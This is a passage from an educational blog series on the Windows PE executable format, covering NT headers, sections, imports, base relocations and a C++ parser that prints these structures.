	printf(" File alignment: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT);
	printf(" Size of image: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE);
	printf(" Size of headers: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS);

	printf("\n Data Directories:\n");
	printf("\n * Export Directory:\n");
	printf(" RVA: 0x%X\n", PEFILE_EXPORT_DIRECTORY.VirtualAddress);
	printf(" Size: 0x%X\n", PEFILE_EXPORT_DIRECTORY.Size);

	..[REDACTED]..

	printf("\n * COM Runtime Descriptor:\n");
	printf(" RVA: 0x%X\n", PEFILE_COM_DESCRIPTOR_DIRECTORY.VirtualAddress);
	printf(" Size: 0x%X\n", PEFILE_COM_DESCRIPTOR_DIRECTORY.Size);
}
```
Parsing Section Headers
ParseSectionHeaders()
This function starts by assigning the PEFILE_SECTION_HEADERS class member to a pointer to an IMAGE_SECTION_HEADER array of the count of PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS.
Then it goes into a loop of PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS iterations where in each iteration it changes the file offset to (e_lfanew + size of NT Headers + loop counter multiplied by the size of a section header) to reach the beginning of the next Section Header, then it reads the new Section Header and assigns it to the next element of PEFILE_SECTION_HEADERS.
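The offset calculation described above can be expressed as a small helper. The function and its parameters are illustrative, not part of the author's parser; in the real code the sizes come from sizeof(IMAGE_NT_HEADERS64) and sizeof(IMAGE_SECTION_HEADER):

```cpp
#include <cstdint>

// File offset of the i-th section header: the section header array starts
// immediately after the NT Headers, and each header is fixed-size.
uint32_t sectionHeaderOffset(uint32_t e_lfanew, uint32_t sizeofNtHeaders,
                             uint32_t sizeofSectionHeader, uint32_t index) {
    return e_lfanew + sizeofNtHeaders + index * sizeofSectionHeader;
}
```

For a PE32+ file, sizeof(IMAGE_NT_HEADERS64) is 0x108 and sizeof(IMAGE_SECTION_HEADER) is 0x28.
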
Parsing Import Directory
ParseImportDirectory()
To parse out the Import Directory Table, we first need to determine the count of IMAGE_IMPORT_DESCRIPTORs.
This function starts by resolving the file offset of the Import Directory, then it goes into a loop where in each loop it keeps reading the next import descriptor.
In each iteration it checks if the descriptor has zeroed out values, if that is the case then we’ve reached the end of the Import Directory, so it breaks.
Otherwise it increments _import_directory_count and the loop continues.
After finding the size of the Import Directory, the function assigns the PEFILE_IMPORT_TABLE class member to a pointer to an IMAGE_IMPORT_DESCRIPTOR array of the count of _import_directory_count then goes into another loop similar to the one we’ve seen in ParseSectionHeaders() to parse out the import descriptors.
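The counting loop can be sketched over an in-memory array. The ImportDescriptor type below mirrors the field names of IMAGE_IMPORT_DESCRIPTOR but is a simplified stand-in, and countImportDescriptors() is my illustrative helper, not the author's code:

```cpp
#include <cstdint>

// Simplified stand-in for IMAGE_IMPORT_DESCRIPTOR; field names match winnt.h.
struct ImportDescriptor {
    uint32_t OriginalFirstThunk; // RVA of the ILT
    uint32_t TimeDateStamp;
    uint32_t ForwarderChain;
    uint32_t Name;               // RVA of the DLL name string
    uint32_t FirstThunk;         // RVA of the IAT
};

// Count descriptors until the all-zero terminator descriptor is reached.
int countImportDescriptors(const ImportDescriptor* table) {
    int count = 0;
    while (table[count].OriginalFirstThunk != 0 || table[count].TimeDateStamp != 0 ||
           table[count].ForwarderChain != 0 || table[count].Name != 0 ||
           table[count].FirstThunk != 0) {
        count++;
    }
    return count;
}
```
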
After obtaining the import descriptors, further parsing is needed to retrieve information about the imported functions.
This is done by the PrintImportTableInfo() function.
This function iterates over the import descriptors, and for each descriptor it resolves the file offset of the DLL name, retrieves the DLL name then prints it, it also prints the ILT RVA, the IAT RVA and whether the import is bound or not.
After that it resolves the file offset of the ILT then it parses out each ILT entry.
If the Ordinal/Name flag is set it prints the function ordinal, otherwise it prints the function name, the hint RVA and the hint.
If the ILT entry is zeroed out, the loop breaks and the next import descriptor parsing iteration starts.
We’ve discussed the details about this in the PE imports post.
Parsing Base Relocations
ParseBaseReloc()
This function follows the same process we've seen in ParseImportDirectory().
It resolves the file offset of the Base Relocation Directory, then it loops over each relocation block until it reaches a zeroed out block. Then it parses out these blocks and saves each IMAGE_BASE_RELOCATION structure in PEFILE_BASERELOC_TABLE.
One thing to note here that differs from ParseImportDirectory(): in addition to keeping a block counter, we also keep a size counter that's incremented by adding each block's SizeOfBlock value in every iteration.
We do this because relocation blocks don’t have a fixed size, and in order to correctly calculate the offset of the next relocation block we need the total size of the previous blocks.
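The accumulation can be sketched as follows; BaseRelocation is a minimal stand-in for IMAGE_BASE_RELOCATION and blockOffsets() is an illustrative helper, not the author's implementation:

```cpp
#include <cstdint>
#include <vector>

// Minimal stand-in for IMAGE_BASE_RELOCATION (the block header).
struct BaseRelocation {
    uint32_t VirtualAddress; // page RVA the block applies to
    uint32_t SizeOfBlock;    // total block size, header included
};

// Because blocks are variable-sized, the file offset of block i is the
// table's offset plus the sum of the sizes of all preceding blocks.
std::vector<uint32_t> blockOffsets(uint32_t tableOffset,
                                   const std::vector<BaseRelocation>& blocks) {
    std::vector<uint32_t> offsets;
    uint32_t sizeCounter = 0;
    for (const BaseRelocation& block : blocks) {
        offsets.push_back(tableOffset + sizeCounter);
        sizeCounter += block.SizeOfBlock;
    }
    return offsets;
}
```
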
This function iterates over the base relocation blocks, and for each block it resolves the file offset of the block, then it prints the block RVA, size and number of entries (calculated by subtracting the size of IMAGE_BASE_RELOCATION from the block size then dividing that by the size of a WORD).
After that it iterates over the relocation entries and prints the relocation value, and from that value it separates the type and the offset and prints each one of them.
I hope that seeing actual code has given you a better understanding of what we’ve discussed throughout the previous posts.
I believe there are better ways to implement this than the ones I have presented; I'm in no way a C++ programmer and I know there's always room for improvement, so feel free to reach out to me, any feedback would be much appreciated.
A dive into the PE file format - PE file structure - Part 6: PE Base Relocations
Introduction
In this post we’re going to talk about PE base relocations.
We’re going to discuss what relocations are, then we’ll take a look at the relocation table.
Relocations
When a program is compiled, the compiler assumes that the executable will be loaded at a certain base address. That address is saved in IMAGE_OPTIONAL_HEADER.ImageBase, and some addresses are calculated based on it and then hardcoded within the executable.
However, for a variety of reasons, it's not very likely that the executable will actually get its desired base address; it will be loaded at a different one, and that will make all of the hardcoded addresses invalid.
A list of all hardcoded values that will need fixing if the image is loaded at a different base address is saved in a special table called the Relocation Table (a Data Directory within the .reloc section).
The process of relocating (done by the loader) is what fixes these values.
Let’s take an example, the following code defines an int variable and a pointer to that variable:
```cpp
int test = 2;
int* testPtr = &test;
```
During compile time, the compiler assumes a base address; let's say it assumes a base address of 0x1000. It decides that test will be located at an offset of 0x100 and, based on that, gives testPtr a value of 0x1100.
Later on, a user runs the program and the image gets loaded into memory.
It gets a base address of 0x2000, which means the hardcoded value of testPtr is now invalid. The loader fixes that value by adding the difference between the actual base address and the assumed one, in this case 0x1000 (0x2000 - 0x1000), so the new value of testPtr will be 0x2100 (0x1100 + 0x1000), the correct new address of test.
Relocation Table
As described by Microsoft documentation, the base relocation table contains entries for all base relocations in the image.
It’s a Data Directory located within the .reloc section, it’s divided into blocks, each block represents the base relocations for a 4K page and each block must start on a 32-bit boundary.
Each block starts with an IMAGE_BASE_RELOCATION structure followed by any number of offset field entries.
The IMAGE_BASE_RELOCATION structure specifies the page RVA, and the size of the relocation block.
Each offset field entry is a WORD; the high 4 bits define the relocation type (check the Microsoft documentation for a list of relocation types), and the low 12 bits store an offset from the RVA specified in the IMAGE_BASE_RELOCATION structure at the start of the relocation block.
Each relocation entry is processed by adding the page RVA to the image base address; adding the entry's offset to that then gives the absolute address of the location that needs fixing.
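Splitting an entry and computing the target address can be sketched like this (the function name is mine, for illustration):

```cpp
#include <cstdint>

// Split a relocation entry into its type (high 4 bits) and offset (low 12
// bits), then compute the absolute address that needs patching.
uint64_t relocTarget(uint64_t imageBase, uint32_t pageRva, uint16_t entry) {
    uint16_t type   = entry >> 12;     // e.g. IMAGE_REL_BASED_DIR64 is 10
    uint16_t offset = entry & 0x0FFF;  // offset within the 4K page
    (void)type; // the type decides how the patch is applied; unused here
    return imageBase + pageRva + offset;
}
```
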
The PE file I’m looking at contains only one relocation block, its size is 0x28 bytes:
We know that each block starts with an 8-byte-long structure, meaning that the size of the entries is 0x20 bytes (32 bytes), each entry’s size is 2 bytes so the total number of entries should be 16.
A dive into the PE file format - PE file structure - Part 5: PE Imports (Import Directory Table, ILT, IAT)
Introduction
In this post we’re going to talk about a very important aspect of PE files, the PE imports.
To understand how PE files handle their imports, we'll go over some of the Data Directories present in the Import Data section (.idata): the Import Directory Table, the Import Lookup Table (ILT), also referred to as the Import Name Table (INT), and the Import Address Table (IAT).
Import Directory Table
The Import Directory Table is a Data Directory located at the beginning of the .idata section.
It consists of an array of IMAGE_IMPORT_DESCRIPTOR structures, each one of them is for a DLL.
It doesn’t have a fixed size, so the last IMAGE_IMPORT_DESCRIPTOR of the array is zeroed-out (NULL-Padded) to indicate the end of the Import Directory Table.
TimeDateStamp: A time date stamp, that’s initially set to 0 if not bound and set to -1 if bound.
In case of an unbound import the time date stamp gets updated to the time date stamp of the DLL after the image is bound.
In case of a bound import it stays set to -1 and the real time date stamp of the DLL can be found in the Bound Import Directory Table in the corresponding IMAGE_BOUND_IMPORT_DESCRIPTOR .
We’ll discuss bound imports in the next section.
ForwarderChain: The index of the first forwarder chain reference.
This is something responsible for DLL forwarding. (DLL forwarding is when a DLL forwards some of its exported functions to another DLL.)
Name: An RVA of an ASCII string that contains the name of the imported DLL.
FirstThunk: RVA of the IAT.
Bound Imports
A bound import essentially means that the import table contains fixed addresses for the imported functions.
These addresses are calculated and written during compile time by the linker.
Using bound imports is a speed optimization, it reduces the time needed by the loader to resolve function addresses and fill the IAT, however if at run-time the bound addresses do not match the real ones then the loader will have to resolve these addresses again and fix the IAT.
When discussing IMAGE_IMPORT_DESCRIPTOR.TimeDateStamp, I mentioned that in case of a bound import, the time date stamp is set to -1 and the real time date stamp of the DLL can be found in the corresponding IMAGE_BOUND_IMPORT_DESCRIPTOR in the Bound Import Data Directory.
Bound Import Data Directory
The Bound Import Data Directory is similar to the Import Directory Table, however as the name suggests, it holds information about the bound imports.
It consists of an array of IMAGE_BOUND_IMPORT_DESCRIPTOR structures, and ends with a zeroed-out IMAGE_BOUND_IMPORT_DESCRIPTOR.
IMAGE_BOUND_IMPORT_DESCRIPTOR is defined as follows:
```cpp
typedef struct _IMAGE_BOUND_IMPORT_DESCRIPTOR {
	DWORD   TimeDateStamp;
	WORD    OffsetModuleName;
	WORD    NumberOfModuleForwarderRefs;
	// Array of zero or more IMAGE_BOUND_FORWARDER_REF follows
} IMAGE_BOUND_IMPORT_DESCRIPTOR, *PIMAGE_BOUND_IMPORT_DESCRIPTOR;
```
TimeDateStamp: The time date stamp of the imported DLL.
OffsetModuleName: An offset to a string with the name of the imported DLL.
It's an offset from the first IMAGE_BOUND_IMPORT_DESCRIPTOR.
NumberOfModuleForwarderRefs: The number of the IMAGE_BOUND_FORWARDER_REF structures that immediately follow this structure.
IMAGE_BOUND_FORWARDER_REF is a structure that’s identical to IMAGE_BOUND_IMPORT_DESCRIPTOR, the only difference is that the last member is reserved.
That’s all we need to know about bound imports.
Import Lookup Table (ILT)
Sometimes people refer to it as the Import Name Table (INT).
Every imported DLL has an Import Lookup Table.
IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk holds the RVA of the ILT of the corresponding DLL.
The ILT is essentially a table of names or references, it tells the loader which functions are needed from the imported DLL.
The ILT consists of an array of 32-bit numbers (for PE32) or 64-bit numbers (for PE32+); the last one is zeroed out to indicate the end of the ILT.
Each of these entries encodes information as follows:
Bit 31/63 (most significant bit): This is called the Ordinal/Name flag, it specifies whether to import the function by name or by ordinal.
Bits 15-0: If the Ordinal/Name flag is set to 1 these bits are used to hold the 16-bit ordinal number that will be used to import the function, bits 30-15/62-15 for PE32/PE32+ must be set to 0.
Bits 30-0: If the Ordinal/Name flag is set to 0 these bits are used to hold an RVA of a Hint/Name table.
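Decoding a PE32+ ILT entry according to the layout above can be sketched as follows; the helper names are mine, not from winnt.h:

```cpp
#include <cstdint>

// Ordinal/Name flag: bit 63 of a 64-bit (PE32+) ILT entry.
bool importByOrdinal(uint64_t entry) {
    return (entry >> 63) & 1;
}

// Ordinal number: bits 15-0, only meaningful when the flag is set.
uint16_t ordinalNumber(uint64_t entry) {
    return (uint16_t)(entry & 0xFFFF);
}

// Hint/Name table RVA: bits 30-0, only meaningful when the flag is clear.
uint32_t hintNameTableRva(uint64_t entry) {
    return (uint32_t)(entry & 0x7FFFFFFF);
}
```
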
Hint/Name Table
A Hint/Name table is a structure defined in winnt.h as IMAGE_IMPORT_BY_NAME:
Hint: A WORD that contains a number used to look up the function. That number is first used as an index into the export name pointer table; if that initial check fails, a binary search is performed on the DLL's export name pointer table.
Name: A null-terminated string that contains the name of the function to import.
Import Address Table (IAT)
On disk, the IAT is identical to the ILT; however, when the binary is loaded into memory, the entries of the IAT get overwritten with the addresses of the functions being imported.
Summary
So to summarize what we discussed in this post: for every DLL the executable imports functions from, there will be an IMAGE_IMPORT_DESCRIPTOR within the Import Directory Table.
The IMAGE_IMPORT_DESCRIPTOR will contain the name of the DLL, and two fields holding RVAs of the ILT and the IAT.
The ILT will contain references for all the functions that are being imported from the DLL.
The IAT will be identical to the ILT until the executable is loaded in memory, then the loader will fill the IAT with the actual addresses of the imported functions.
If the DLL import is a bound import, then the import information will be contained in IMAGE_BOUND_IMPORT_DESCRIPTOR structures in a separate Data Directory called the Bound Import Data Directory.
Let’s take a quick look at the import information inside of an actual PE file.
Here’s the Import Directory Table of the executable:
All of these entries are IMAGE_IMPORT_DESCRIPTORs.
As you can see, the TimeDateStamp of all the imports is set to 0, meaning that none of these imports are bound, this is also confirmed in the Bound? column added by PE-bear.
For example, if we take USER32.dll and follow the RVA of its ILT (referenced by OriginalFirstThunk), we’ll find only 1 entry (because only one function is imported), and that entry looks like this:
This is a 64-bit executable, so the entry is 64 bits long.
As you can see, the Ordinal/Name flag (the most significant bit) is set to 0, indicating that a Hint/Name table should be used to look up the function.
We know that the RVA of this Hint/Name table is held in the lower bits of the entry, so we should follow RVA 0x29F8:
Now we're looking at an IMAGE_IMPORT_BY_NAME structure; the first two bytes hold the hint, which in this case is 0x283, and the rest of the structure holds the full name of the function, which is MessageBoxA.
We can verify that our interpretation of the data is correct by looking at how PE-bear parsed it, and we’ll see the same results:
Conclusion
That’s all I have to say about PE imports, in the next post I’ll discuss PE base relocations.
Thanks for reading.
A dive into the PE file format - PE file structure - Part 4: Data Directories, Section Headers and Sections
Introduction
In the last post we talked about the NT Headers and we skipped the last part of the Optional Header which was the data directories.
In this post we’re going to talk about what data directories are and where they are located.
We’re also going to cover section headers and sections in this post.
Data Directories
The last member of the IMAGE_OPTIONAL_HEADER structure was an array of IMAGE_DATA_DIRECTORY structures defined as follows:
It’s a very simple structure with only two members, first one being an RVA pointing to the start of the Data Directory and the second one being the size of the Data Directory.
So what is a Data Directory? Basically a Data Directory is a piece of data located within one of the sections of the PE file.
Data Directories contain useful information needed by the loader, an example of a very important directory is the Import Directory which contains a list of external functions imported from other libraries, we’ll discuss it in more detail when we go over PE imports.
Please note that not all Data Directories have the same structure, the IMAGE_DATA_DIRECTORY.VirtualAddress points to the Data Directory, however the type of that directory is what determines how that chunk of data is going to be parsed.
Here’s a list of Data Directories defined in winnt.h. (Each one of these values represents an index in the DataDirectory array):
If we take a look at the contents of IMAGE_OPTIONAL_HEADER.DataDirectory of an actual PE file, we might see entries where both fields are set to 0:
This means that this specific Data Directory is not used (doesn’t exist) in the executable file.
Sections and Section Headers
Sections
Sections are the containers of the actual data of the executable file, they occupy the rest of the PE file after the headers, precisely after the section headers.
Some sections have special names that indicate their purpose, we’ll go over some of them, and a full list of these names can be found on the official Microsoft documentation under the “Special Sections” section.
.text: Contains the executable code of the program.
.data: Contains the initialized data.
.bss: Contains uninitialized data.
.rdata: Contains read-only initialized data.
.edata: Contains the export tables.
.idata: Contains the import tables.
.reloc: Contains image relocation information.
.rsrc: Contains resources used by the program, these include images, icons or even embedded binaries.
.tls: (Thread Local Storage), provides storage for every executing thread of the program.
Section Headers
After the Optional Header and before the sections comes the Section Headers.
These headers contain information about the sections of the PE file.
A Section Header is a structure named IMAGE_SECTION_HEADER defined in winnt.h as follows:
Name: First field of the Section Header, a byte array of the size IMAGE_SIZEOF_SHORT_NAME that holds the name of the section.
IMAGE_SIZEOF_SHORT_NAME has the value of 8 meaning that a section name can’t be longer than 8 characters.
For longer names the official documentation mentions a work-around by filling this field with an offset in the string table, however executable images do not use a string table so this limitation of 8 characters holds for executable images.
PhysicalAddress or VirtualSize: A union, so these are two names for the same field. For executable images it contains the total size of the section when it's loaded into memory.
VirtualAddress: The documentation states that for executable images this field holds the address of the first byte of the section relative to the image base when loaded in memory, and for object files it holds the address of the first byte of the section before relocation is applied.
SizeOfRawData: This field contains the size of the section on disk, it must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
SizeOfRawData and VirtualSize can be different, we’ll discuss the reason for this later in the post.
PointerToRawData: A pointer to the first page of the section within the file, for executable images it must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
PointerToRelocations: A file pointer to the beginning of relocation entries for the section. It’s set to 0 for executable files.
PointerToLineNumbers: A file pointer to the beginning of COFF line-number entries for the section. It’s set to 0 because COFF debugging information is deprecated.
NumberOfRelocations: The number of relocation entries for the section, it’s set to 0 for executable images.
NumberOfLinenumbers: The number of COFF line-number entries for the section, it’s set to 0 because COFF debugging information is deprecated.
Characteristics: Flags that describe the characteristics of the section.
These characteristics are things like if the section contains executable code, contains initialized/uninitialized data, can be shared in memory.
A complete list of section characteristics flags can be found on the official Microsoft documentation.
SizeOfRawData and VirtualSize can be different, and this can happen for multiple reasons.
SizeOfRawData must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment, so if the section size is less than that value the rest gets padded and SizeOfRawData gets rounded to the nearest multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
However when the section is loaded into memory it doesn’t follow that alignment and only the actual size of the section is occupied.
In this case, SizeOfRawData will be greater than VirtualSize.
The opposite can happen as well.
If the section contains uninitialized data, that data isn't accounted for on disk; but when the section gets mapped into memory, it expands to reserve space for when the uninitialized data is later initialized and used.
This means that the section occupies less space on disk than it does in memory; in this case, VirtualSize will be greater than SizeOfRawData.
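The rounding that produces SizeOfRawData can be sketched as a one-liner (the helper name is illustrative):

```cpp
#include <cstdint>

// SizeOfRawData is the section's size rounded up to the nearest multiple of
// IMAGE_OPTIONAL_HEADER.FileAlignment; VirtualSize is the unpadded size.
uint32_t roundToFileAlignment(uint32_t size, uint32_t fileAlignment) {
    return ((size + fileAlignment - 1) / fileAlignment) * fileAlignment;
}
```

With the common FileAlignment of 0x200, a section of 0xD2C bytes rounds up to a SizeOfRawData of 0xE00, matching the .text section shown later in the post.
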
Here’s the view of Section Headers in PE-bear:
We can see Raw Addr. and Virtual Addr. fields which correspond to IMAGE_SECTION_HEADER.PointerToRawData and IMAGE_SECTION_HEADER.VirtualAddress.
Raw Size and Virtual Size correspond to IMAGE_SECTION_HEADER.SizeOfRawData and IMAGE_SECTION_HEADER.VirtualSize.
We can see how these two fields are used to calculate where the section ends, both on disk and in memory.
For example if we take the .text section, it has a raw address of 0x400 and a raw size of 0xE00, if we add them together we get 0x1200 which is displayed as the section end on disk.
Similarly we can do the same with virtual size and address, virtual address is 0x1000 and virtual size is 0xD2C, if we add them together we get 0x1D2C.
The Characteristics field marks some sections as read-only, some other sections as read-write and some sections as readable and executable.
PointerToRelocations, NumberOfRelocations and NumberOfLinenumbers are set to 0 as expected.
Conclusion
That’s it for this post. We’ve discussed what Data Directories are and we talked about sections.
The next post will be about PE imports.
Thanks for reading.
A dive into the PE file format - PE file structure - Part 3: NT Headers
Introduction
In the previous post we looked at the structure of the DOS header and we reversed the DOS stub.
In this post we’re going to talk about the NT Headers part of the PE file structure.
Before we get into the post, we need to talk about an important concept that we’re going to see a lot, and that is the concept of a Relative Virtual Address or an RVA.
An RVA is just an offset from where the image was loaded in memory (the Image Base). So to translate an RVA into an absolute virtual address you need to add the value of the RVA to the value of the Image Base.
PE files rely heavily on the use of RVAs as we’ll see later.
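For example, assuming the default image base of a 64-bit executable (0x140000000, used here purely for illustration):

```python
# RVA -> absolute virtual address: just add the image base.
def rva_to_va(image_base: int, rva: int) -> int:
    return image_base + rva

IMAGE_BASE = 0x140000000  # common default for 64-bit executables

print(hex(rva_to_va(IMAGE_BASE, 0x12C4)))  # 0x1400012c4
```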
NT Headers (IMAGE_NT_HEADERS)
NT headers is a structure defined in winnt.h as IMAGE_NT_HEADERS. By looking at its definition we can see that it has three members: a DWORD signature, an IMAGE_FILE_HEADER structure called FileHeader and an IMAGE_OPTIONAL_HEADER structure called OptionalHeader.
It’s worth mentioning that this structure is defined in two different versions, one for 32-bit executables (Also named PE32 executables) named IMAGE_NT_HEADERS and one for 64-bit executables (Also named PE32+ executables) named IMAGE_NT_HEADERS64.
The main difference between the two versions is the used version of IMAGE_OPTIONAL_HEADER structure which has two versions, IMAGE_OPTIONAL_HEADER32 for 32-bit executables and IMAGE_OPTIONAL_HEADER64 for 64-bit executables.
The first member of the NT headers structure is the PE signature. It's a DWORD, which means it occupies 4 bytes.
It always has a fixed value of 0x00004550, which corresponds to the bytes 50 45 00 00, or PE\0\0 in ASCII.
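A minimal sketch of checking this signature over raw file bytes; it also uses the DOS header's e_lfanew field (at offset 0x3C), which holds the file offset of the NT headers:

```python
import struct

def has_pe_signature(data: bytes) -> bool:
    # Check the DOS header magic ("MZ") first.
    if data[:2] != b"MZ":
        return False
    # e_lfanew (offset 0x3C in the DOS header) points to the NT headers.
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # The first DWORD of the NT headers must be "PE\0\0".
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
```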
Here’s a screenshot from PE-bear showing the PE signature:
File Header (IMAGE_FILE_HEADER)
Also called “The COFF File Header”, the File Header is a structure that holds some information about the PE file.
It’s defined as IMAGE_FILE_HEADER in winnt.h, here’s the definition:
Machine: This is a number that indicates the type of machine (CPU architecture) the executable is targeting. This field can have a lot of values, but we're only interested in two of them: 0x8664 for AMD64 and 0x14C for i386. For a complete list of possible values you can check the official Microsoft documentation.
NumberOfSections: This field holds the number of sections (or the number of section headers aka. the size of the section table.).
TimeDateStamp: A unix timestamp that indicates when the file was created.
PointerToSymbolTable and NumberOfSymbols: These two fields hold the file offset of the COFF symbol table and the number of entries in that symbol table. However, they're set to 0, meaning no COFF symbol table is present; this is done because COFF debugging information is deprecated.
SizeOfOptionalHeader: The size of the Optional Header.
Characteristics: A flag that indicates the attributes of the file, these attributes can be things like the file being executable, the file being a system file and not a user program, and a lot of other things. A complete list of these flags can be found on the official Microsoft documentation.
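As an illustration, the seven fields can be unpacked from raw bytes with python's struct module (the sample values below are made up, not from a real file):

```python
import struct

# IMAGE_FILE_HEADER is 20 bytes: 2 WORDs, 3 DWORDs, 2 WORDs (little-endian).
FILE_HEADER_FMT = "<HHIIIHH"

FIELD_NAMES = ("Machine", "NumberOfSections", "TimeDateStamp",
               "PointerToSymbolTable", "NumberOfSymbols",
               "SizeOfOptionalHeader", "Characteristics")

def parse_file_header(data: bytes, offset: int = 0) -> dict:
    return dict(zip(FIELD_NAMES,
                    struct.unpack_from(FILE_HEADER_FMT, data, offset)))

# Made-up sample: AMD64, 6 sections, 0xF0-byte optional header.
sample = struct.pack(FILE_HEADER_FMT, 0x8664, 6, 0, 0, 0, 0xF0, 0x22)
print(hex(parse_file_header(sample)["Machine"]))  # 0x8664
```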
Here’s the File Header contents of an actual PE file:
Optional Header (IMAGE_OPTIONAL_HEADER)
The Optional Header is the most important header of the NT headers, the PE loader looks for specific information provided by that header to be able to load and run the executable.
It’s called the optional header because some file types like object files don’t have it, however this header is essential for image files.
It doesn’t have a fixed size, that’s why the IMAGE_FILE_HEADER.SizeOfOptionalHeader member exists.
The first 8 members of the Optional Header structure are standard for every implementation of the COFF file format, the rest of the header is an extension to the standard COFF optional header defined by Microsoft, these additional members of the structure are needed by the Windows PE loader and linker.
As mentioned earlier, there are two versions of the Optional Header, one for 32-bit executables and one for 64-bit executables.
The two versions are different in two aspects:
The size of the structure itself (or the number of members defined within the structure): IMAGE_OPTIONAL_HEADER32 has 31 members while IMAGE_OPTIONAL_HEADER64 only has 30 members, that additional member in the 32-bit version is a DWORD named BaseOfData which holds an RVA of the beginning of the data section.
The data type of some of the members: The following 5 members of the Optional Header structure are defined as DWORD in the 32-bit version and as ULONGLONG in the 64-bit version:
ImageBase
SizeOfStackReserve
SizeOfStackCommit
SizeOfHeapReserve
SizeOfHeapCommit
Let’s take a look at the definition of both structures.
typedef struct _IMAGE_OPTIONAL_HEADER {
    //
    // Standard fields.
    //
    WORD    Magic;
    BYTE    MajorLinkerVersion;
    BYTE    MinorLinkerVersion;
    DWORD   SizeOfCode;
    DWORD   SizeOfInitializedData;
    DWORD   SizeOfUninitializedData;
    DWORD   AddressOfEntryPoint;
    DWORD   BaseOfCode;
    DWORD   BaseOfData;
    //
    // NT additional fields.
    //
    DWORD   ImageBase;
    DWORD   SectionAlignment;
    DWORD   FileAlignment;
    WORD    MajorOperatingSystemVersion;
    WORD    MinorOperatingSystemVersion;
    WORD    MajorImageVersion;
    WORD    MinorImageVersion;
    WORD    MajorSubsystemVersion;
    WORD    MinorSubsystemVersion;
    DWORD   Win32VersionValue;
    DWORD   SizeOfImage;
    DWORD   SizeOfHeaders;
    DWORD   CheckSum;
    WORD    Subsystem;
    WORD    DllCharacteristics;
    DWORD   SizeOfStackReserve;
    DWORD   SizeOfStackCommit;
    DWORD   SizeOfHeapReserve;
    DWORD   SizeOfHeapCommit;
    DWORD   LoaderFlags;
    DWORD   NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
Magic: Microsoft documentation describes this field as an integer that identifies the state of the image, the documentation mentions three common values:
0x10B: Identifies the image as a PE32 executable.
0x20B: Identifies the image as a PE32+ executable.
0x107: Identifies the image as a ROM image.
The value of this field is what determines whether the executable is 32-bit or 64-bit, IMAGE_FILE_HEADER.Machine is ignored by the Windows PE loader.
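A small sketch of that check:

```python
# Deciding the executable's bitness from the Optional Header's Magic field.
PE32_MAGIC = 0x10B   # 32-bit
PE32P_MAGIC = 0x20B  # 64-bit
ROM_MAGIC = 0x107    # ROM image

def image_kind(magic: int) -> str:
    if magic == PE32_MAGIC:
        return "PE32 (32-bit)"
    if magic == PE32P_MAGIC:
        return "PE32+ (64-bit)"
    if magic == ROM_MAGIC:
        return "ROM image"
    return "unknown"

print(image_kind(0x20B))  # PE32+ (64-bit)
```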
MajorLinkerVersion and MinorLinkerVersion: The linker major and minor version numbers.
SizeOfCode: This field holds the size of the code (.text) section, or the sum of all code sections if there are multiple sections.
SizeOfInitializedData: This field holds the size of the initialized data (.data) section, or the sum of all initialized data sections if there are multiple sections.
SizeOfUninitializedData: This field holds the size of the uninitialized data (.bss) section, or the sum of all uninitialized data sections if there are multiple sections.
AddressOfEntryPoint: An RVA of the entry point when the file is loaded into memory.
The documentation states that for program images this relative address points to the starting address and for device drivers it points to initialization function. For DLLs an entry point is optional, and in the case of entry point absence the AddressOfEntryPoint field is set to 0.
BaseOfCode: An RVA of the start of the code section when the file is loaded into memory.
BaseOfData (PE32 Only): An RVA of the start of the data section when the file is loaded into memory.
ImageBase: This field holds the preferred address of the first byte of image when loaded into memory (the preferred base address), this value must be a multiple of 64K.
Due to memory protections like ASLR, among other reasons, the address specified by this field is almost never used. In that case the PE loader chooses an unused memory range to load the image into. After loading the image at that address, the loader goes through a process called relocation, in which it fixes the constant addresses within the image to work with the new image base. A special section called the relocation section (.reloc) holds information about the places that need fixing, more on that in the upcoming posts.
SectionAlignment: This field holds a value that gets used for section alignment in memory (in bytes), sections are aligned in memory boundaries that are multiples of this value.
The documentation states that this value defaults to the page size for the architecture and it can’t be less than the value of FileAlignment.
FileAlignment: Similar to SectionAlignment, this field holds the value used to align the sections' raw data on disk (in bytes). If the size of the actual data in a section is less than the FileAlignment value, the rest of the chunk gets padded with zeroes to keep the alignment boundaries.
The documentation states that this value should be a power of 2 between 512 and 64K, and if the value of SectionAlignment is less than the architecture’s page size then the sizes of FileAlignment and SectionAlignment must match.
MajorOperatingSystemVersion, MinorOperatingSystemVersion, MajorImageVersion, MinorImageVersion, MajorSubsystemVersion and MinorSubsystemVersion: These members of the structure specify the major version number of the required operating system, the minor version number of the required operating system, the major version number of the image, the minor version number of the image, the major version number of the subsystem and the minor version number of the subsystem respectively.
Win32VersionValue: A reserved field that the documentation says should be set to 0.
SizeOfImage: The size (in bytes) of the image, including all headers, as the image is loaded in memory. It gets rounded up to a multiple of SectionAlignment because this value is used when loading the image into memory.
SizeOfHeaders: The combined size of the DOS stub, PE header (NT Headers), and section headers rounded up to a multiple of FileAlignment.
CheckSum: A checksum of the image file, it’s used to validate the image at load time.
Subsystem: This field specifies the Windows subsystem (if any) that is required to run the image. A complete list of the possible values of this field can be found on the official Microsoft documentation.
DLLCharacteristics: This field defines some characteristics of the executable image file, like if it’s NX compatible and if it can be relocated at run time.
I have no idea why it’s named DLLCharacteristics, it exists within normal executable image files and it defines characteristics that can apply to normal executable files.
A complete list of the possible flags for DLLCharacteristics can be found on the official Microsoft documentation.
